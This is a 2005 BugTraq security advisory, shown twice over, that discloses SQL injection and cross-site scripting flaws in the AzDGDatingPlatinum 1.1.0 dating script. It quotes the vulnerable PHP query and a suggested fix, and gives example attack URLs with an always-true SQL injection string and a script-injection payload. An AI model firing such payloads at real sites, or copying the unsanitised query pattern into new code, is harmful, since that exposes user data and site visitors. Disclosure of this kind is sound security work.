BugTraq
Back to list
|
Post reply
AzDGDatingPlatinum multiple vulnerabilities
Apr 09 2005 04:44PM
kre0n mail ru
ADZ Security Team
===================
Info
Program: AzDGDatingPlatinum
Version: tested 1.1.0
Modules: view.php, members/index.php
Bug type: SQL Injection, XSS
Vendor site: http://www.azdg.com/
Vendor Informed: Yes
===================
Bug Info
SQL Injection:
At module view.php I've found a logical error:
// code
if (isset($id) || $id != "" || is_numeric($id)) {
$result =
mysql_query("SELECT * FROM ".C_MYSQL_MEMBERS."
WHERE id ='$id'ANDstatus = '7'");
// code
As you see, here is no check about some "bad" symbols like quote....
Replace "||" to "&&" to fix it
(gpc_magic_quotes must be Off to exploit this bug)
Example:
http://[host]/[path]/view.php?l=default&id=3'%20OR%20'a'='a'/*
http://127.0.0.1/dating.lan/members/index.php?l=default&a=v&from=[SQL CODE] - Second "bad" module without $from checking
XSS:
Simple XSS-bugs, like so:
http://[host]/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/scri
pt%3E
===================
Contact
ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n (at) mail (dot) ru [email concealed], adz.kreon (at) gmail (dot) com [email concealed] (for non-russian users)
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
ADZ Security Team
===================
Info
Program: AzDGDatingPlatinum
Version: tested 1.1.0
Modules: view.php, members/index.php
Bug type: SQL Injection, XSS
Vendor site: http://www.azdg.com/
Vendor Informed: Yes
===================
Bug Info
SQL Injection:
At module view.php I've found a logical error:
// code
if (isset($id) || $id != "" || is_numeric($id)) {
$result =
mysql_query("SELECT * FROM ".C_MYSQL_MEMBERS."
WHERE id ='$id'ANDstatus = '7'");
// code
As you see, here is no check about some "bad" symbols like quote....
Replace "||" to "&&" to fix it
(gpc_magic_quotes must be Off to exploit this bug)
Example:
http://[host]/[path]/view.php?l=default&id=3'%20OR%20'a'='a'/*
http://127.0.0.1/dating.lan/members/index.php?l=default&a=v&from=[SQL CODE] - Second "bad" module without $from checking
XSS:
Simple XSS-bugs, like so:
http://[host]/[path]/view.php?l=default&id=3%3Cscript%3Ealert();%3C/scri
pt%3E
===================
Contact
ADZ Security Team
URL: http://adz.void.ru/
IRC: #adz @ QuakeNet
MAIL: kre0n (at) mail (dot) ru [email concealed], adz.kreon (at) gmail (dot) com [email concealed] (for non-russian users)
[ reply ]